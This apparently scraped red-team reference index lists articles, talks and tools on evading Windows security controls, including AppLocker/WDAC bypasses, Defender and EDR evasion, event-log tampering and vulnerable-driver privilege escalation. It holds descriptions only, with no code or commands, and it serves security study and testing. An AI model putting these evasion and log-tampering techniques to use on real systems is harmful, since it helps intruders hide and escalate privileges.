RunMe.c
- Trick to run arbitrary command when code execution policy is enforced (i.e. AppLocker or equivalent). Works on Win98 (lol) and up - tested on 7/8
- Window Signed Binary
-
VBA-RunPE
- A VBA implementation of the RunPE technique or how to bypass application whitelisting.
-
Applocker
-
101
-
Ultimate AppLocker ByPass List
- "The goal of this repository is to document the most common and known techniques to bypass AppLocker. Since AppLocker can be configured in different ways I maintain a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone. I also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs."
-
myAPPLockerBypassSummary
- Simple APPLocker bypass summary based on the extensive work of @api0cradle
-
Ultimate AppLocker ByPass List
-
Articles/Blogposts/Writeups
- AppLocker Bypass Checklist - netbiosX
- AppLocker Case study: How insecure is it really? Part 1 oddvar.moe
- AppLocker Case study: How insecure is it really? Part 2](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)
- AppLocker Bypass – Weak Path Rules
- Applocker Bypass via Registry Key Manipulation
- Bypassing AppLocker Custom Rules - 0x09AL Security Blog
- AppLocker Bypass – CMSTP - netbiosX
- Bypassing AppLocker Custom Rules
-
A small discovery about AppLocker - oddvar.moe
- 'While I was prepping for a session a while back I made a a little special discovery about AppLocker. Turns out that the files that AppLocker uses under C:\Windows\System32\AppLocker can be used in many cases to bypass a Default AppLocker ruleset.'
- Applocker Bypass via Registry Key Manipulation - Francesco Mifsud
- Bypassing AppLocker Custom Rules - 0x09AL
-
myAPPLockerBypassSummary
- Simple APPLocker bypass summary based on the extensive work of @api0cradle
- Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies - sixdub(2014)
-
AppLocker Bypass – File Extensions - pentestlab.blog(2017)
- Bypassing AppLocker restrictions usually requires the use of trusted Microsoft binaries that can execute code or weak path rules. However it is possible in a system that it has been configured with default rules and it is allowing the use of command prompt and PowerShell to the users to bypass AppLocker by using payloads with different file extensions.
-
Bring your own .NET Core Garbage Collector - Paul Laine(2020)
- This blog post explains how it is possible to abuse a legitimate feature of .Net Core, and exploit a directory traversal bug to achieve application whitelisting bypass.
- Code
- Abusing .NET Core – Evasion - pentestlaboratories.com
- Bypassing Windows protection mechanisms & Playing with OffensiveNim - s3cur3th1ssh1t(2020)
- Signed Binary Proxy Execution via PyCharm - ArchCloudLabs(2021)
-
Talks/Presentations/Videos
-
GreatSCT: Gotta Catch 'Em AWL - Chris Spehn(CircleCityCon2018)
- Great Scott Marty, we went all the way back to 1995! The project is called Great SCT (Great Scott). GreatSCT is an open source project to generate application whitelist (AWL) bypasses. This tool is intended for BOTH red and blue team. Blue team can benefit by testing the publicly known application whitelisting bypass methods. We will review the most common application whitelisting bypass methods and how to utilize these methods with GreatSCT.
-
GreatSCT: Gotta Catch 'Em AWL - Chris Spehn(CircleCityCon2018)
-
Tools
-
Backdoor-Minimalist.sct
- Applocker bypass
-
Evasor
- The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue and red teams in the assessment of a post-exploitation phase.
-
Backdoor-Minimalist.sct
-
101
-
Windows Defender Application Control
-
101
- Application Control for Windows - docs.ms
- Windows Defender Application Control and AppLocker Overview - docs.ms
- Windows Defender Application Control design guide - docs.ms
- Deploy Windows Defender Application Control policies by using Group Policy - docs.ms
- Plan for Windows Defender Application Control lifecycle policy management - docs.ms
- Planning and getting started on the Windows Defender Application Control deployment process
-
Articles/Blogposts/Writeups
-
Documenting and Attacking a Windows Defender Application Control Feature the Hard Way — A Case Study in Security Research Methodology - Matt Graeber
- My goal for this blog post is to not only describe the mechanics of this new feature, but more importantly, I wanted to use this opportunity to paint a picture of the methodology I applied to understand and attempt to bypass the feature. So, if you’re already interested in WDAC features, great. If you’re not, that’s also cool but I hope you’ll follow along with the specific strategies I took to understand an undocumented Windows feature.
- Exploring the WDAC Microsoft Recommended Block Rules: VisualUiaVerifyNative - BOHOPS(2020)
-
Documenting and Attacking a Windows Defender Application Control Feature the Hard Way — A Case Study in Security Research Methodology - Matt Graeber
- Talks/Presentations/Videos
- Tools
-
101
-
Attack Surface Reduction
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Defender
-
101
- Next-generation protection in Windows 10, Windows Server 2016, and Windows Server 2019 - docs.ms
- Microsoft Defender Advanced Threat Protection - docs.ms
- Microsoft Defender ATP Blog - Microsoft
-
Configure Microsoft Defender Antivirus exclusions on Windows Server - docs.ms
- "Microsoft Defender Antivirus on Windows Server 2016 and 2019 automatically enrolls you in certain exclusions, as defined by your specified server role. See the list of automatic exclusions (in this article). These exclusions do not appear in the standard exclusion lists that are shown in the Windows Security app."
-
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware - ms.com
- Manual updates for Defender
-
DisableAntiSpyware - docs.ms
- Reg key to disable Defender on 1903 and prior.
- Fun times trying to get this working in later versions....
- Reverse engineering Windows Defender's signature for Metasploit Framework's metsrv.dll - plowsec(StackOverflow2018)
- comment by plowsec on Metasploit Project(2018)
-
Articles/Blogposts/Writeups
- Untangling the “Windows Defender” Naming Mess - Lenny Zeltser
- Bypass Windows Defender Attack Surface Reduction - Emeric Nasi
- Documenting and Attacking a Windows Defender Application Control Feature the Hard Way — A Case Study in Security Research Methodology - Matt Graeber
- Bypassing AV (Windows Defender) … the tedious way. - CB Hue
-
Dear Windows Defender, please tell me where I can drop my malicious code. - Simone Aonzo
- 'The Get-MpPreference cmdlet exposes the field ExclusionPath without administrator privilege.'
- Hiding Metasploit Shellcode to Evade Windows Defender - Rapid7
- Incapacitating Windows Defender - offensiveops.io
- Evading Windows Defender with 1 Byte Change - @spottheplanet
- Bypassing Windows Defender Runtime Scanning - Charalampos Billinis(2020)
- Silencing Microsoft Defender for Endpoint using firewall rules - Søren Fritzbøger(2021)
- Bypass Defender and other thoughts on Unicode RTLO attacks - Emeric Nasi(2020)
-
Talks/Presentations/Videos
- Reverse Engineering Windows Defender’s JavaScript Engine - Alexei Bulazel(REcon Brussels18)
- Auditing and Bypassing Windows Defender Application Control - Matt Graeber
-
Bypass Windows Exploit Guard ASR - Emeric Nasi(OffensiveCon2020)
- How to bypass all Microsoft latest "Attack Surface Reduction" rules with malicious Office documents and scripts. The last years, I have been doing some research around Windows security. I liked exploring APT/Redteam techniques and payload used for social engineering and airgap bypass attacks. I am naturally interested into new security features such as ASR. Microsoft introduced Attack Surface Reduction (ASR) as part of Windows defender exploit guard. ASR is composed of a set of configurable rules such as: "Block Office applications from creating child process". While these rules seem effective against common Office and scripts malwares, there are ways to bypass all of them. We will go over each rule related to malicious Office or VB scripts behavior, analyze how It work behind the scene and find a way to bypass it. As example we will take common attack scenario and see how they can be achieved with all rules enforced: Download execute DLL/EXE/script from Office/VBscript; Drop execute embedded DLL/EXE/script from Office/VBscript; Machine takeover with Meterpreter shell from Office/VBscript; Lateral movement/UAC bypass/AMSI bypass/etc.
- Adapting Exploit Frameworks to Evade Microsoft ATP - Jake Krasnov, Anthony Rose(Defcon27)
-
Tools
- Windows Defender Emulator Tools
-
ExpandDefenderSig.ps1
- Decompresses Windows Defender AV signatures for exploration purposes
-
Ninjasploit
- A meterpreter extension for applying hooks to avoid windows defender memory scans
-
ThreatCheck - RastaMouse
- Modified version of Matterpreter's DefenderCheck. Takes a binary as input (either from a file on disk or a URL), splits it until it pinpoints that exact bytes that the target engine will flag on and prints them to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.
-
DeviceGuard
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
ExploitGuard
-
101
-
Protect devices from exploits - docs.ms
- Exploit protection automatically applies a number of exploit mitigation techniques to operating system processes and apps. Exploit protection is supported beginning with Windows 10, version 1709 and Windows Server, version 1803.
-
Windows Defender Exploit Guard under the hood - Artur Wojtkowski
- In this article, we will explain the main functionality of Exploit Protection and ASR rules and its’ internals.
-
Protect devices from exploits - docs.ms
-
Articles/Blogposts/Writeups
-
Exploit Protection Event Documentation - Palantir & Matt Graeber
- Documentation and supporting script sample for Windows Exploit Guard
- Assessing the effectiveness of a new security data source: Windows Defender Exploit Guard - Palantir(2019)
- Vulnserver Exploit vs Windows Defender Exploit Guard - Chad Duffey(2020)
- Exploit Guard Mistakes - Chad Duffey(2020)
- Exploit Guard vs Process (DLL) Injection - Chad Duffey(2020)
-
Exploit Protection Event Documentation - Palantir & Matt Graeber
- Talks/Presentations/Videos
-
101
-
101
-
Windows Event Log Avoidance & Deletion
-
Articles/Writeups
-
Remove individual lines from Windows XML Event Log (EVTX) files
- Remove individual lines from Windows XML Event Log (EVTX) files
- Phant0m: Killing Windows Event Log - artofpwn.com
- Universally Evading Sysmon and ETW - Dylan Halls(2020)
- Mute Sysmon - Silence Sysmon via event manifest tampering - SecurityJosh(2020)
- Deletion and Bypass of Windows Logs - 3gstudent
- Domain Controller Security Logs – how to get at them without being a Domain Admin - girlgerms(2016)
- Pwning Windows Event Logging with YARA rules - Dylan Halls(2020)
- Disabling Windows Event Logs by Suspending EventLog Service Threads - @spottheplanet
-
Remove individual lines from Windows XML Event Log (EVTX) files
-
Tools
-
Ghost In The Logs
- This tool allows you to evade sysmon and windows event logging, my blog post about it can be found here
-
Invoke-Phant0m
- This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-
Log-killer
- Clear all your logs in [linux/windows] servers
-
MuteSysmon
- A PowerShell script to prevent Sysmon from writing its events
-
Windwos-EventLog-Bypass
- Use subProcessTag Value From TEB to identify Event Log Threads. Use NtQueryInformationThread API and I_QueryTagInformation API to get service name of the thread. Auto kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-
EvtMute
- This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging.
-
Ghost In The Logs
-
Articles/Writeups
-
Microsoft ATA & ATP
-
Articles/Blogposts/Talks/Writeups
- Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics
- Red Team Revenge - Attacking Microsoft ATA
- Evading Microsoft ATA for Active Directory Domination
- Week of Evading Microsoft ATA - Announcement and Day 1 - Nikhil Mittal(Aug 2017)
- Week of Evading Microsoft ATA - Day 2 - Overpass-the-hash and Golden Ticket - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 3 - Constrained Delegation, Attacks across trusts, DCSync and DNSAdmins - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 4 - Silver ticket, Kerberoast and SQL Servers - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 5 - Attacking ATA, Closing thoughts and Microsoft's response - Nikhil MIttal
- Microsoft Advanced Threat Analytics – My best practices - Oddvar Moe
- Evading WinDefender ATP credential-theft: kernel version - B4rtik
-
Talks/Presentations/Videos
-
Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics - Chris Thompson(BHUSA2017)
- Windows Defender Advanced Threat Protection is now available for all Blue Teams to utilize within Windows 10 Enterprise and Server 2012/16, which includes detection of post breach tools, tactics and techniques commonly used by Red Teams, as well as behavior analytics.
- Evading Microsoft ATA for Active Directory Domination - Nikhil Mittal(BH USA17)
- Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP - BC-Security(2019)
-
Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics - Chris Thompson(BHUSA2017)
-
Tools
-
DefenderCheck
- Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on, and then prints those offending bytes to the screen.
-
DefenderCheck
-
Articles/Blogposts/Talks/Writeups
-
DeviceGuard Bypass
- 101
-
Articles/Blogposts/Talks/Writeups
- Defeating Device Guard: A look into CVE-2017-0007
- Consider Application Whitelisting with Device Guard - subt0x10(2017)
- Bypassing Application Whitelisting using MSBuild.exe - Device guard Example and Mitigations - subt0x10(2017)
- Defeating Device Guard: A look into CVE-2017–0007 - Matt Nelson
- UMCI vs Internet Explorer: Exploring CVE-2017–8625 - Matt Nelson
- Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass - Google
- Talks/Presentations/Videos
-
Tools
-
DeviceGuard Bypasses - James Forshaw
- This solution contains some of my UMCI/Device Guard bypasses. They're are designed to allow you to analyze a system, such as Windows 10 S which comes pre-configured with a restrictive UMCI policy.
- Window 10 Device Guard Bypass
-
DeviceGuard Bypasses - James Forshaw
-
DLL Execution-Related
- DLL Hijacking
-
DLL Hollowing/Module Stomping/Overloading
- 101
-
Articles/Blogposts/Writeups
- Remote DLL Injection, Plus… - Security Ninja(2016)
- Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing - Sumith Maniath, Prashanth Krushna Kadam(2019)
- Hiding malicious code with “Module Stomping”: Part 1 - Aliz Hammdond(2019)
- Hiding malicious code with “Module Stomping”: Part 2 - Aliz Hammdond(2019)
- Understanding And Detecting Dll 1nj3ct0n & Process Hollowing - Alparslan Akyıldız academy(2019)
- Detecting VBA Process Hollowing With Cortex XDR - Stav Setty and Aviad Meyer(2020)
- Talks/Presentations/Videos
- Papers
- Articles/Blogposts/Writeups
-
Tools
-
Phantom DLL hollowing
- DLL hollowing is a technique which can be used to provide stealth for malware in memory, either within the local process or a remote one (in combination with process injection/hollowing).
- CodeCoverageModuleStomping
-
Phantom DLL hollowing
-
Drivers
-
101
- Overview of Device and Driver Installation - docs.ms
- Getting a kernel mode driver signed for Windows 10 - Christoph Lüders(2016)
- Methodology for Static Reverse Engineering of Windows Kernel Drivers - Matt Hand(2020)
- Kernel Hacking With HEVD Part 1 - The Setup - Brian Beaudry(2016)
-
HackSys Extreme Vulnerable Driver
- HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level.
- See
Rootkits.md
- Articles/Blogposts/Writeups * Shhmon — Silencing Sysmon via Driver Unload - Matt Hand(2019) * How to Bypass Kernel Anticheat & Develop Drivers - Rake(2018) * Undocumented Windows API Functions & Structures - Rake(2020) * Ring 0 / 3 Protection - Jitsumi(2020)
- Debugging
-
Filter Drivers
-
101
- Filter Drivers - docs.ms
- About file system filter drivers - docs.ms
- Filter driver - Wikipedia
-
File systems driver design guide
- This section of the WDK provides conceptual information related to file systems and filter drivers.
- How File System Filter Drivers Are Similar to Device Drivers - docs.ms
- The Role of a Filter Driver - Flylib.com
- FLTMC.exe - SS64
-
Articles
- Understanding Minifilters: Why and How File System Filter Drivers Evolved - OSR.com
- How File System Filter Drivers Are Different from Device Drivers
- Introduction to File System Filter Drivers - EaseFilter
- Understanding Windows File System Filter Driver - EaseFilter
- Filter Drivers in Windows - MohanKumar(2017)
- Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver - Matt Hand(2020)
- Hunting for Bugs in Windows Mini-Filter Drivers - James Forshaw(2021)
-
101
-
Driver Loading/Unloading
- Articles/Blogposts/Writeups
-
Attacking
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Who’s Watching the Watchdog? Uncovering a Privilege Escalation Vulnerability in OEM Driver - Amit Rapaport(BlueHat IL2019)
- With Microsoft continuously improving kernel mitigations and raising the exploitation bar for native kernel components, third-party kernel drivers are becoming a more appealing target for real attackers and security researchers. A vulnerability in a signed third-party driver can have a dramatic impact as it can be abused by attackers to escalate their privileges, without the complexity of a kernel zero-day. Computer manufacturers usually ship devices with software and tools to facilitate device management. This software often contains components running with ring-0 privileges in kernel. With these components installed by default, they must be as secure as the kernel, otherwise they can become the Achilles Heel for the whole kernel security design. In this session, we’ll explain exactly how we discovered such a driver. From an anomalous behavior alerted by a kernel sensor of Windows Defender ATP, we dug deeper into a specific device management driver, where we found a highly obscure design. This led us to the discovery of a zero-day vulnerability, which resulted in a local privilege escalation that affected millions of devices.
- Device Driver Debauchery and MSR Madness - Ryan Warns, Timothy Harrison(INFILTRATE2019)
-
Papers
-
VDM: Vulnerable Driver Manipulation - Xeroxz
- Abstract—This research paper documents the process of usinga vulnerable Windows kernel driver exposing a physical memoryread and write1primitive to call any function inside of theWindows kernel; while also teaching you the basics of pagingand physical memory.
-
VDM: Vulnerable Driver Manipulation - Xeroxz
- Training
-
Tools
-
ExploitCapcom
- This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.
-
Reflective-Driver-Loader
- Reflective Kernel Driver injection is a injection technique base off Reflective DLL injection by Stephen Fewer. The technique bypasses Windows driver signing enforcement (KMCS). Reflective programming is employed to perform the loading of a driver from memory into the kernel. As such the driver is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. Injection works on Windows Vista up to Windows 10, running on x64.
-
IRPMon
- The goal of the tool is to monitor requests received by selected device objects or kernel drivers. The tool is quite similar to IrpTracker but has several enhancements. It supports 64-bit versions of Windows (no inline hooks are used, only modifications to driver object structures are performed) and monitors IRP, FastIo, AddDevice, DriverUnload and StartIo requests.
- gdrv-loader
-
Windows10 - Custom Kernel Signers
- Load self-signed drivers without TestSigning or disable DSE.
-
KsDumper
- Dumping processes using the power of kernel space !
-
drvmap
- driver mapper / capcom wrapper
-
KernelBhop
- Cheat that uses a driver instead WinAPI for Reading / Writing memory.
- Shhmon - Neuter Sysmon by unloading its driver
-
TitanHide
- TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy.
-
ExploitCapcom
-
Who’s Watching the Watchdog? Uncovering a Privilege Escalation Vulnerability in OEM Driver - Amit Rapaport(BlueHat IL2019)
-
Writeups
- Part 19: Kernel Exploitation -> Logic bugs in Razer rzpnk.sys - FuzzySec
- MSI ntiolib.sys/winio.sys local privilege escalation - rewolf(2016)
- Dell SupportAssist Driver - Local Privilege Escalation - hatRiot(2018)
- Mother of All Drivers – New Vulnerabilities Found in Windows Drivers - Jesse Michael, Mickey Shkatov
- CVE-2019-9730: LPE in Synaptics Sound Device Driver - @Jackson_T(2019)
- Viper RGB Driver Local Privilege Escalation (CVE-2019-18845) - ActiveCyber.us(2020)
- CORSAIR iCUE Driver Local Privilege Escalation (CVE-2020-8808) - ActiveCyber.us(2020)
- MSI Ambient Link Multiple Vulnerabilities - CoreSecurity(2020)
- CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys - h0mbre(2020)
-
Dissecting the Windows Defender Driver - WdFilter (Part 1) - n4r1b(2020)
- For those who don’t know, WdFilter is the main kernel component of Windows Defender. Roughly, this Driver works as a Minifilter from the load order group “FSFilter Anti-Virus”, this means that is attached to the File System stack (Actually, quite high - Big Altitude) and handles I/O operations in some Pre/Post callbacks. Not only that, this driver also implements other techniques to get information of what’s going on in the system. The goal of this series of post is to have a solid understanding on how this works under the hood.
- Part 2
- Part 3
- Part 4
- How to Bypass Kernel Anticheat & Develop Drivers - Rake(2018)
- Undocumented Windows API Functions & Structures - Rake(2020)
- Ring 0 / 3 Protection - Jitsumi(2020)
-
Papers
-
Windows Kernel-mode Payload Fundamentals - bugcheck, skape(2006)
- This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
-
Windows Kernel-mode Payload Fundamentals - bugcheck, skape(2006)
- MS ELAM
- Writing
-
Tools
-
Physmem drivers
- A collection of various vulnerable (mostly physical memory exposing) drivers.
-
Vulnerable Driver Manipulation
- A library to manipulate drivers exposing a physical memory read/write primitive to allow the user to call any function in the kernel. There are thousands of drivers exposing physical memory read/write, a bunch are listed in this repo. Currently the project is using gdrv.sys. This is basiclly what physmeme was about but that project is not truly "physical read and write" whereas this project is. This project can be used more broadly then physmeme.
-
DriverMon
- Monitor activity of (almost) any driver
-
Capcom Rootkit Proof-Of-Concept
- Capcom Rootkit POC
- Windows kernel driver exploits
-
ColdHide
- ColdHide is a mini and simple open source user mode anti-anti debug library x86/x64 for Windows. To inject this library try using ColdMDLoader.
-
Canadian Furious Beaver
- Canadian Furious Beaver is a tool for hijacking IRPs handler in Windows drivers, and facilitating the process of analyzing Windows drivers for vulnerabilities
-
TDL (Turla Driver Loader)
- Driver loader for bypassing Windows x64 Driver Signature Enforcement
-
injdrv
- injdrv is a proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC.
-
Physmem drivers
-
101
-
Endpoint Detection & Response
-
Articles/Blogposts/Talks/Writeups
- Lets Create An EDR… And Bypass It! Part 1 - Ceri Coburn(2020)
- A Guide to Reversing and Evading EDRs: Part 1 - @Jackson_T
- Endpoint Protection, Detection and Response Bypass Techniques Index - p3zx.blogspot
-
Generic bypass of next-gen intrusion / threat / breach detection systems
- The focus of this blog post is to bypass network monitoring tools, e.g. good-old IDS or next-generation threat detection systems in a generic way. The focus is on the exploit delivery.
- Relying on usermode data is a bad idea (AKA Stop Trusting The Enemy) - krabsonsecurity(2020
- Dechaining Macros and Evading EDR
- A tale of EDR bypass methods - s3cur3th1ssh1t(2021)
-
Talks/Presentations/Videos
-
EDR, ETDR, Next Gen AV is all the rage, so why am I enraged? - Michael Gough - Derbycon7
- A funny thing happened when I evaluated several EDR, ETDR and Next Gen AV products, currently all the rage and latest must have security solution. Surprisingly to me the solutions kinda sucked at things we expected them to do or be better at, thus this talk so you can learn from our efforts. While testing, flaws were discovered and shared with the vendors, some of the flaws, bugs, or vulns that were discovered will be discussed. This talk takes a look at what we initially expected the solutions to provide us, the options or categories of what these solutions address, what to consider when doing an evaluation, how to go about testing these solutions, how they would fit into our process, and what we found while testing these solutions. What enraged me about these EDR solutions were how they were all over the place in how they worked, how hard or ease of use of the solutions, and the fact I found malware that did not trigger an alert on every solution I tested. And this is the next new bright and shiny blinky security savior solution? The news is not all bad, there is hope if you do some work to understand what these solutions target and provide, what to look for, and most importantly how to test them! What we never anticipated or expected is the tool we used to compare the tests and how well it worked and how it can help you.
-
Modern Evasion Techniques - Jason Lang(Derbycon7 2017)
- Slides
- As pentesters, we are often in need of working around security controls. In this talk, we will reveal ways that we bypass in-line network defenses, spam filters (in line and cloud based), as well as current endpoint solutions. Some techniques are old, some are new, but all work in helping to get a foothold established. Defenders: might want to come to this one.
- Next Gen AV vs My Shitty Code by James Williams - SteelCon 2018
- Red Teaming in the EDR age - Will Burgess(WWHF2018)
- An Inconvenient Truth: Evading the Ransomware Protection in Windows 10 - Soya Aoyama(GrrCON2018)
-
Maintaining post-exploitation opsec in a world with EDR - Michael Roberts, Martin Roberts(Derbycon2018)
- How a modern pentesting or red team can remain stealthy during post exploitation activities. Will go in depth on various code execution and lateral movement techniques and indicate ways to improve upon these methods.
-
Reversing & bypassing EDRs - Christopher Vella(CrikeyCon2019)
- Endpoint Detection and Response (EDR) product vendors will give you the spiel on what they do and their capabilities, but how do they actually work at the lowest level? And how can we discover weaknesses in these products to develop bypasses or evaluate them? Christopher will reverse engineer an EDR product and the windows kernel to unveil its inner-workings, alongside the windows kernel structures and functions EDR products rely on to operate, and by doing so discover weaknesses and gaps in their protections that allow actors to bypass the product’s defenses, rendering them null & void. Finally, by abusing an identified weakness, he’ll use a custom-built mimikatz to dump all the hashes on a machine protected by EDR.
-
Testing Endpoint Protection: How Anyone Can Bypass Next Gen AV - Kevin Gennuso(Derbycon2019)
- Well-known antivirus vendors all have "next gen" solutions, and most newer players in the market claim to be "better" simply because they're new.This software is a significant investment for any organization, so it should do what it claims to do, right?In this talk, we'll discuss methodologies for testing these products, known and lesser-known payload generation frameworks, and how you can use these to inform your choice in EDR solutions.
-
Unveiling the Underground World of Anti-Cheats - Joel Noguera(BHEU2019)
- Slides
- During our research, we analyzed, tested and discovered multiple bypassing techniques against different current market Anti-Cheat technologies such as XignCode3, EasyAntiCheat and BattleEye, to understand and determine the current state of the art of Anti-Cheat software. We use a combination of static and dynamic techniques to document the different techniques to protect and unprotect gaming software. As a result, we put together a tool "AntiCheat-Testing-Framework" that contains a series of bypassing techniques to test them against current market Anti-Cheats software, this will allow attendees and researchers to understand the virtues and weaknesses of them. This talk pretends to catch everyone's attention from new people to experts on the field, starting with a state of the market and interesting cases around the cheating world, and finishing with a deep explanation of each analyzed technique and the results we obtained during the journey.
-
Tricking modern endpoint security products - Michel Coene(SANS2020)
- The current endpoint monitoring capabilities we have available to us are unprecedented. Many tools and our self/community-built detection rules rely on parent-child relationships and command-line arguments to detect malicious activity taking place on a system. There are, however, ways the adversaries can get around these detections. During this presentation, we'll talk about the following techniques and how we can detect them: Parent-child relationships spoofing; Command-line arguments spoofing; Process injection; Process hollowing
- Tradecraft - This is why your tools and exploits get detected by EDR - xentropy(2020)
- Offensive Development: Post-Exploitation Tradecraft in an EDR World - Dominic Chell(x33fcon2020)
-
Detection and Efficiency Testing of Endpoint Security Sensors - Filipi Pires(HTBCyberWeek2020)
- During this presentation we’ll show our tests performed in three different endpoint security solutions (CrowdStrike, Sophos, and Cybereason) where we simulate targeted attacks using many strategies of attacks to obtain a panoramic view of the resilience presented by the solutions, with regard to the efficiency in its detection by signatures, NGAV and Machine Learning, running scripts, such as: Download many malwares within the victim machine, moving all those malware to other folders (expectation of detection without execution), and as well as, an idea in to download these artifacts directly on the victim’s machine using malware from The Zoo Repository while also running scripts with powershell downloading daily malwares batches, provide by MalwaresBazaar using API access.
-
EDR, ETDR, Next Gen AV is all the rage, so why am I enraged? - Michael Gough - Derbycon7
-
Tools
-
SharpBlock
- A method of bypassing EDR's active projection DLL's by preventing entry point execution
- WhiteBeam
-
BLUESPAWN
- BLUESPAWN is an active defense and endpoint detection and response tool which means it can be used by defenders to quickly detect, identify, and eliminate malicious activity and malware across a network.
-
ProcessThis
- Small C# tool to call out AV/EDR processes running.
-
Invoke-EDRChecker
- Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services, the registry and running drivers for the presence of known defensive products such as AV's, EDR's and logging tools.
-
SharpEDRChecker
- Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
-
Telemetry Sourcerer
- Enumerate and disable common sources of telemetry used by AV/EDR.
-
SharpBlock
-
Specific EDRs
- Cybereason
-
Cylance
- Bypass Cylance Memory Exploitation Defense & Script Cntrl - Chris Ross(2017)
- How I evaded “next-generation” Cylance Smart AntiVirus in less than 15 minutes - slaeryan
- [Silencing Cylance: A Case Study in Modern EDRs - Adam Chester, Dominic Chell(2019)](2019(https://www.mdsec.co.uk/2019/03/silencing-cylance-a-case-study-in-modern-edrs/)
-
Cylance, I Kill You! - Adi Ashkenazy, Shahar Zini(2019)
- "By carefully analyzing the engine and model of Cylance’s AI based antivirus product, we identify a peculiar bias towards a specific game. Combining an analysis of the feature extraction process, its heavy reliance on strings, and its strong bias for this specific game, we are capable of crafting a simple and rather amusing bypass. Namely, by appending a selected list of strings to a malicious file, we are capable of changing its score significantly, avoiding detection. This method proved successful for 100% of the top 10 Malware for May 2019, and close to 90% for a larger sample of 384 malware."
- Crowdstrike
- Kaspersky
- McAfee
- Palo Alto
- Symantec
-
Articles/Blogposts/Talks/Writeups
-
Kernel Callbacks
-
Articles/Blogposts/Writeups
-
Silencing the EDR. How to disable process, threads and image-loading detection callbacks. - matteomalvica.com
- This post is about resuming the very inspiring Rui’s piece on Windows Kernel’s callbacks and taking it a little further by extending new functionalities and build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded module or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore EDR original code once we are done with our task. The resulting tool has been tested on the following Windows 10 builds: 1903,1909 and 2004.
-
Silencing the EDR. How to disable process, threads and image-loading detection callbacks. - matteomalvica.com
-
Articles/Blogposts/Writeups
-
PowerShell Script Block Logging
-
Articles/Blogposts/Writeups
-
A Critique of Logging Capabilities in PowerShell v6
- Introduces 'PowerShell Upgrade Attack'
- Some PowerShell Logging Observations - mrt-f.com
- Bypass for PowerShell ScriptBlock Warning Logging of Suspicious Commands - cobbr.io(2017)
- PowerShell ScriptBlock Logging Bypass - cobbr.io(2017)
- Exploring PowerShell AMSI and Logging Evasion - Adam Chester(2018)
-
A Critique of Logging Capabilities in PowerShell v6
- Talks/Presentations/Videos
- Tools
-
Articles/Blogposts/Writeups
-
PowerShell Constrained Language Mode
-
Articles/Blogposts/Writeups
-
A Critique of Logging Capabilities in PowerShell v6
- Introduces 'PowerShell Upgrade Attack'
-
A Critique of Logging Capabilities in PowerShell v6
-
Talks/Presentations/Videos
-
Isolated to Constrained Language Mode - Living within the Confines - Christopher Truncer(BSidesDC2018)
- This talk will cover what constrained language mode is, what works, and what doesn’t compared with the tools you are likely used to using. I’ll talk about building out tools in constrained language mode, the frustrations, and tips to make it easier. I’ll also cover existing tools for operating within a constrained language mode environment, and add a new update to WMImplant based on my approach to building out constrained language mode capabilities.
- PowerShell Constrained Language Mode Enforcement and Bypass Deep Dive - Matt Graeber(2020)
-
